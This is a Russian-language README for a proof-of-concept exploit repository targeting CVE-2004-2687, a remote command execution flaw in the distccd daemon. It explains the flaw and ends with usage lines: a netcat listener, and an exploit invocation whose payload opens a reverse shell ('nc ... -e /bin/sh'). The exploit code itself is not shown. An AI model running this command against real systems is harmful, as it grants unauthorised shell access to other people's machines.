
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Обновлено до Python3
Обзор
Этот репозиторий содержит PoC-эксплойт для уязвимости distccd, известной как CVE-2004-2687. Уязвимость существует в демоне distccd, который является частью распределённой системы компиляции C/C++ distcc. При неправильной конфигурации distccd позволяет удалённым злоумышленникам выполнять произвольные команды на сервере без какой-либо аутентификации.
Детали уязвимости
distcc предназначен для распределения задач компиляции между несколькими машинами с целью ускорения процесса сборки. Однако, если демон distccd не защищён должным образом, он раскрывает уязвимость удалённого выполнения кода (RCE). Это происходит потому, что демон прослушивает сетевой порт и принимает команды от любого клиента, позволяя им выполнять shell-команды на сервере от имени пользователя, запускающего демон.
Уязвимости присвоен идентификатор CVE-2004-2687, и она затрагивает версии distccd до 3.1. При эксплуатации злоумышленник может получить shell-доступ к уязвимой машине, что может привести к компрометации всей системы.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Уязвимость :

Эксплойт :
